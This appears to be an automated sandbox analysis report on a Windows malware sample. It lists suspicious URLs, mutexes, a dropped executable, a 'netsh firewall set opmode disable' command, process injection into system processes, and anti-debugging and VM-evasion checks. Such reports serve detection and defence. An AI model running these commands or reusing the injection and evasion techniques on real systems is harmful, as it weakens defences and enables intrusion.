        Source: LisectAVT_2403002B_38.exe, 00000000.00000002.1519756597.0000000002312000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: http://www.klkjwre9fqwieluoi.info/
        Source: LisectAVT_2403002B_38.exe, 00000000.00000002.1519756597.0000000002312000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: http://www.klkjwre9fqwieluoi.info/abp470n5.sysGetSystemDirectoryAdrivers
        Source: LisectAVT_2403002B_38.exe, LisectAVT_2403002B_38.exe, 00000000.00000003.1445581749.00000000005BB000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1519540120.00000000022D8000.00000004.00000010.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1519540120.00000000022DE000.00000004.00000010.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1521616058.00000000050CB000.00000004.00000010.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000003.1445124876.0000000000553000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1519756597.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1519273821.0000000000930000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: http://www.ukikt.org/mainf.gif
        Source: LisectAVT_2403002B_38.exe, 00000000.00000002.1518699969.0000000000601000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1518699969.00000000005D6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.otzywy.com/
        Source: LisectAVT_2403002B_38.exe, 00000000.00000002.1522795877.0000000006900000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.otzywy.com/?76caf3=7785203
        Source: LisectAVT_2403002B_38.exe, 00000000.00000002.1518699969.0000000000601000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.otzywy.com/?76caf3=7785203E
        Source: LisectAVT_2403002B_38.exe, 00000000.00000002.1522795877.0000000006900000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.otzywy.com/?76caf3=7785203k
        Source: LisectAVT_2403002B_38.exe, 00000000.00000002.1522795877.0000000006900000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.otzywy.com/?76caf3=7785203om/?76caf3=7785203
        Source: LisectAVT_2403002B_38.exe, 00000000.00000002.1518699969.0000000000601000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.otzywy.com/d
        Source: LisectAVT_2403002B_38.exe, 00000000.00000002.1518699969.00000000005D6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.otzywy.com/onia.my1.ru/mainh.gif?7231d3=37419295
        Source: unknown | Network traffic detected: HTTP traffic on port 49712 -> 443
        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49712
        Source: unknown | HTTPS traffic detected: 195.201.126.132:443 -> 192.168.2.8:49712 version: TLS 1.2

        System Summary

        Source: LisectAVT_2403002B_38.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Code function: 0_2_00407CD0 CreateFileA,DeviceIoControl,CloseHandle
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Code function: 0_2_00405680 OpenSCManagerA,SetLastError,OpenServiceA,ControlService,Sleep,QueryServiceStatus,Sleep,QueryServiceStatus,Sleep,DeleteService,GetLastError,Sleep,CloseServiceHandle,CloseServiceHandle,GetLastError,CloseServiceHandle
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Code function: 0_2_0040A450 DeleteFileA,DeleteFileA,GetModuleFileNameA,MessageBoxA,ExitWindowsEx
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Code function: 0_2_0040A4B9 DeleteFileA,GetModuleFileNameA,MessageBoxA,ExitWindowsEx
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Code function: 0_2_0047B874
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Code function: 0_2_004108EE
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Code function: 0_2_0047B8B0
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Code function: 0_2_00415707
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Code function: 0_2_0040D7D0
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Code function: 0_2_0047B7BF
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Code function: 0_2_022FCAC1
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Code function: 0_2_022F5682
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Code function: 0_2_022F5011
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Code function: 0_2_02306440
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Code function: String function: 00401110 appears 46 times
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Code function: String function: 00410694 appears 48 times
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Code function: String function: 00403E70 appears 234 times
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Code function: String function: 00401C90 appears 56 times
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Code function: String function: 0040C051 appears 35 times
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Code function: String function: 004010C0 appears 42 times
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Code function: String function: 004025B0 appears 66 times
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Code function: String function: 00401820 appears 44 times
        Source: LisectAVT_2403002B_38.exe, 00000000.00000003.1458396386.00000000005CE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameNOTEPAD.EXEj% vs LisectAVT_2403002B_38.exe
        Source: LisectAVT_2403002B_38.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: LisectAVT_2403002B_38.exe | Static PE information: Section: .ardata ZLIB complexity 0.9961708470394737
        Source: classification engine | Classification label: mal100.spre.evad.winEXE@4/4@5/14
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Code function: 0_2_00401720 GetLastError,_sprintf,FormatMessageA,_sprintf,LocalFree,MessageBoxA
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Code function: 0_2_00404180 LookupPrivilegeValueA,GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,GetLastError
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Code function: 0_2_02300D40 LookupPrivilegeValueA,AdjustTokenPrivileges,AdjustTokenPrivileges,FindCloseChangeNotification,GetTokenInformation,GetTokenInformation,lstrcmpiA,CreateMutexA,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,FindCloseChangeNotification
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Code function: 0_2_00407730 _memset,CreateToolhelp32Snapshot,Module32First,CloseHandle
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Code function: 0_2_00407A40 CreateDirectoryA,CreateDirectoryA,CoInitialize,CoCreateInstance,MultiByteToWideChar,CoUninitialize
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Mutant created: \Sessions\1\BaseNamedObjects\wininit.exeM_484_
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Mutant created: \Sessions\1\BaseNamedObjects\registryM_92_
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Mutant created: \Sessions\1\BaseNamedObjects\smss.exeM_324_
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Mutant created: \Sessions\1\BaseNamedObjects\services.exeM_624_
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Mutant created: \Sessions\1\BaseNamedObjects\csrss.exeM_492_
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Mutant created: \Sessions\1\BaseNamedObjects\winlogon.exeM_556_
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Mutant created: \Sessions\1\BaseNamedObjects\fontdrvhost.exeM_784_
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Mutant created: \Sessions\1\BaseNamedObjects\lsass.exeM_640_
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Mutant created: \Sessions\1\BaseNamedObjects\fontdrvhost.exeM_776_
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_868_
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Mutant created: \Sessions\1\BaseNamedObjects\csrss.exeM_408_
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_744_
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Mutant created: \Sessions\1\BaseNamedObjects\Op1mutx9
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_920_
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Mutant created: \Sessions\1\BaseNamedObjects\dwm.exeM_984_
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6052:120:WilError_03
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | File created: C:\Users\user\AppData\Local\Temp\ipyr.exe
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Command line argument: UnInstaller 0_2_00403A30
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | File read: C:\Windows\system.ini
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: LisectAVT_2403002B_38.exe | String found in binary or memory: o-adddeefea/s
        Source: unknown | Process created: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe "C:\Users\user\Desktop\LisectAVT_2403002B_38.exe"
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Process created: C:\Windows\SysWOW64\netsh.exe netsh firewall set opmode disable
        Source: C:\Windows\SysWOW64\netsh.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Section loaded: apphelp.dll
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Section loaded: version.dll
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Section loaded: textshaping.dll
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Section loaded: mpr.dll
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Section loaded: wininet.dll
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Section loaded: sspicli.dll
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Section loaded: uxtheme.dll
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Section loaded: kernel.appcore.dll
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Section loaded: textinputframework.dll
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Section loaded: coreuicomponents.dll
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Section loaded: coremessaging.dll
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Section loaded: ntmarta.dll
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Section loaded: wintypes.dll
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Section loaded: mswsock.dll
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Section loaded: sfc.dll
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Section loaded: sfc_os.dll
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Section loaded: srclient.dll
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Section loaded: spp.dll
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Section loaded: powrprof.dll
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Section loaded: vssapi.dll
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Section loaded: vsstrace.dll
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Section loaded: umpdc.dll
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Section loaded: iertutil.dll
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Section loaded: windows.storage.dll
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Section loaded: wldp.dll
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Section loaded: profapi.dll
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Section loaded: ondemandconnroutehelper.dll
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Section loaded: winhttp.dll
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Section loaded: iphlpapi.dll
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Section loaded: winnsi.dll
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Section loaded: urlmon.dll
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Section loaded: srvcli.dll
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Section loaded: netutils.dll
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Section loaded: dnsapi.dll
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Section loaded: rasadhlp.dll
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Section loaded: fwpuclnt.dll
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Section loaded: schannel.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: ifmon.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: iphlpapi.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: mprapi.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: rasmontr.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: rasapi32.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: fwpuclnt.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: rasman.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: mfc42u.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: authfwcfg.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: fwpolicyiomgr.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: firewallapi.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: dnsapi.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: fwbase.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: dhcpcmonitor.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: dot3cfg.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: dot3api.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: onex.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: eappcfg.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: ncrypt.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: eappprxy.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: ntasn1.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: fwcfg.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: hnetmon.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: netshell.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: nlaapi.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: netsetupapi.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: netiohlp.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: dhcpcsvc.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: winnsi.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: nshhttp.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: httpapi.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: nshipsec.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: userenv.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: activeds.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: polstore.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: winipsec.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: adsldpc.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: nshwfp.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: cabinet.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: p2pnetsh.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: p2p.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: profapi.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: cryptbase.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: rpcnsh.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: whhelper.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: winhttp.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: wlancfg.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: cryptsp.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: wlanapi.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: wshelper.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: wevtapi.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: mswsock.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: peerdistsh.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: uxtheme.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: wcmapi.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: rmclient.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: mobilenetworking.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: slc.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: sppc.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: gpapi.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: ktmw32.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: mprmsg.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: windows.storage.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: wldp.dll
        Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: msasn1.dll
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | File written: C:\Windows\system.ini
        Source: Binary string: notepad.pdbGCTL | source: ipyr.exe.0.dr
        Source: Binary string: notepad.pdb | source: ipyr.exe.0.dr
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Code function: 0_2_0047C11B LoadLibraryA,SetErrorMode,CreateFileMappingA,CreateFileMappingA,MapViewOfFile,CreateThread,Sleep,GetModuleFileNameA,LoadLibraryA,GetProcAddress,CreateMutexA,GetLastError,Sleep,ExitProcess
        Source: LisectAVT_2403002B_38.exe | Static PE information: section name: .ardata
        Source: ipyr.exe.0.dr | Static PE information: section name: .didat
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Code function: 0_2_004106D9 push ecx; ret 0_2_004106EC
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Code function: 0_2_022F0F51 push ebp; iretd 0_2_022F0F52
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Code function: 0_2_023078A0 push eax; ret 0_2_023078CE
        Source: LisectAVT_2403002B_38.exe | Static PE information: section name: .ardata entropy: 7.994014875588453
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Code function: 0_2_00407FC0 GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA

        Hooking and other Techniques for Hiding and Protection

        Source: LisectAVT_2403002B_38.exe, 00000000.00000002.1519756597.0000000002312000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: KeServiceDescriptorTable
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\netsh.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\System32\conhost.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

        Malware Analysis System Evasion

        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess graph_0-25472
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Evasive API call chain: CreateMutex,DecisionNodes,Sleep graph_0-25472
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Stalling execution: Execution stalls by calling Sleep graph_0-25475
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Code function: 0_2_0040A0D0 SetupDiSetSelectedDevice,_memset,SetupDiGetDeviceRegistryPropertyA,SetupDiCallClassInstaller,SetupDiRemoveDevice
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Thread delayed: delay time: 300000
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Thread delayed: delay time: 180000
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ipyr.exe
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess graph_0-25450
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep graph_0-25482
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes graph_0-25829
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe TID: 1568 | Thread sleep time: -300000s >= -30000s
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe TID: 1736 | Thread sleep time: -180000s >= -30000s
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe TID: 3428 | Thread sleep time: -300000s >= -30000s
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe TID: 3832 | Thread sleep time: -1500000s >= -30000s
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe TID: 3832 | Thread sleep time: -300000s >= -30000s
        Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Code function: 0_2_004099CB DialogBoxParamA,_memset,_memset,_memset,GetSystemDirectoryA,_swprintf,FindFirstFileA,FindFirstFileA,_strcpy_s,SHGetFolderPathA,_swprintf,FindFirstFileA,_strcpy_s
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Code function: 0_2_00401A50 FindFirstFileA,SetLastError,GetLastError,GetLastError,FindNextFileA,GetLastError,FindClose
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Code function: 0_2_00409700 GetWindowsDirectoryA,_sprintf,_sprintf,FindFirstFileA,_printf,_sprintf,FindClose,FindNextFileA,FindNextFileA,_sprintf,FindNextFileA,FindClose,FindClose
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Code function: 0_2_022FFA87 Sleep,FindFirstFileA,FindNextFileA,FindClose,Sleep
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Code function: 0_2_022FB81A FindFirstFileA,FindNextFileA,Sleep
        Source: LisectAVT_2403002B_38.exe, 00000000.00000002.1518699969.000000000051E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1522795877.0000000006900000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
        Source: netsh.exe, 00000001.00000002.1499427740.0000000000AF9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: LisectAVT_2403002B_38.exe, 00000000.00000002.1518699969.0000000000601000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWL
        Source: dwm.exe, 00000006.00000000.1460526610.0000026DACB82000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
        Source: dwm.exe, 00000006.00000000.1460526610.0000026DACB82000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | API call chain: ExitProcess graph end node graph_0-25474
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | API call chain: ExitProcess graph end node graph_0-24923
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | API call chain: ExitProcess graph end node graph_0-25452
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | API call chain: ExitProcess graph end node graph_0-25488
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Process information queried: ProcessInformation
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Code function: 0_2_0040C042 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Code function: 0_2_0047C11B LoadLibraryA,SetErrorMode,CreateFileMappingA,CreateFileMappingA,MapViewOfFile,CreateThread,Sleep,GetModuleFileNameA,LoadLibraryA,GetProcAddress,CreateMutexA,GetLastError,Sleep,ExitProcess
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Code function: 0_2_0040E0E8 GetStartupInfoA,GetProcessHeap,GetProcessHeap,HeapAlloc,_fast_error_exit,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,_fast_error_exit,_fast_error_exit,__RTC_Initialize,__ioinit,__amsg_exit,GetCommandLineA,___crtGetEnvironmentStringsA,__setargv,__amsg_exit,__setenvp,__amsg_exit,__cinit,__amsg_exit,__wincmdln
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Process token adjusted: Debug
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Code function: 0_2_0041A62E _raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Code function: 0_2_00416A8C SetUnhandledExceptionFilter
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Code function: 0_2_0040F338 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess

        HIPS / PFW / Operating System Protection Evasion

        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Memory allocated: C:\Windows\System32\fontdrvhost.exe base: D00000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Memory allocated: C:\Windows\System32\fontdrvhost.exe base: AC0000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Memory allocated: C:\Windows\System32\dwm.exe base: 460000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Code function: 0_2_02300D40 LookupPrivilegeValueA,AdjustTokenPrivileges,AdjustTokenPrivileges,FindCloseChangeNotification,GetTokenInformation,GetTokenInformation,lstrcmpiA,CreateMutexA,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,FindCloseChangeNotification
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Memory written: C:\Windows\System32\fontdrvhost.exe base: D00000
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Memory written: C:\Windows\System32\fontdrvhost.exe base: AC0000
        Source: C:\Users\user\Desktop\LisectAVT_2403002B_38.exe | Memory written: C:\Windows\System32\dwm.exe base: 460000
